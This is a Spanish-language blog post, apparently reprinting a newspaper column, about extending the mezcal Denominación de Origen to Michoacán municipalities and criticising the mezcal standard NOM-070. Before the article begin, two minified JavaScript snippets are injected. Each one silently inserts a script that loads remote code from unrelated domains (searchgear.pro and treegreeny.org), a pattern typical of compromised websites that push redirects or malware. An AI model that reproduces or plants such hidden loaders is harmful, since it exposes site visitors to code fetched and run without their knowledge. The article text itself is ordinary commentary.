;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mezcales Tradicionales de los Pueblos de México » 115. ¿Quién decía que no había mezcal en Michoacán?

115. ¿Quién decía que no había mezcal en Michoacán?


Circula ya la noticia de que se autorizó ampliar la zona de Denominación de Origen Mezcal (DOM) a los municipios michoacanos de Acuitzio, Aguililla, Ario, Buenavista, Charo, Chinicuila, Coalcomán, Cojumatlán, Cotija, Erongarícuaro, Hidalgo, Indaparapeo, Jiquilpan, La Huacana, Los Reyes, Madero, Marcos Castellanos, Morelia, Queréndaro, Sahuayo, Salvador Escalante, Tacámbaro, Tancítaro, Tarímbaro, Tepalcatepec, Turicato, Tzitzio, Venustiano Carranza y Vista Hermosa. La resolución será real cuando se publique en el Diario Oficial de la Federación: esperamos sea pronto.

Este reconocimiento que tardó 6 años, es un mínimo avance en el respeto a los derechos culturales -y humanos- tutelados por el artículo 4° de la Constitución, derechos por definición inalienables e irrenunciables. Y cabe preguntar: ¿continuarán violándose los derechos de productores de mezcales tradicionales (MT) de Puebla, Jalisco, EdoMex y otros diez estados donde se elaboran, al impedirles utilizar la palabra mezcal en sus botellas por el hecho anticonstitucional de excluirlos de la DOM? ¿Acaso la DOM está por encima de la Constitución y de las garantías individuales?

A los michoacanos les esperan trabajos arduos para cumplir con la Norma Oficial Mexicana 070 que induce a la adulteración del mezcal (impreso.milenio.com/node/9094774) y establece parámetros físico-químicos sin fundamento en conocimiento científico, del MT o en el de otros destilados. Muestra: la norma permite graduaciones entre 36 y 55 grados; un MT de puntas (llamado flor en Michoacán) a 67° grados está prohibido. ¿Cuál es la razón? Contraejemplo: whisky a 66° (www.smws.co.uk/whisky/127.19_Hairy-chested,_claymore-wielding_dram.html).

Con esta experiencia, los michoacanos han cobrado un papel central en la defensa de los derechos de productores de MT de estados excluidos de la DOM, lo que exigirá mucha generosidad e inteligencia de su parte.

Quien desee saborear MT, acuda el miércoles 21 a la Logia en El Convento: Fernández Leal 96, Coyoacán, DF.

http://impreso.milenio.com/node/9114863

Category: Milenio, Publicaciones

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *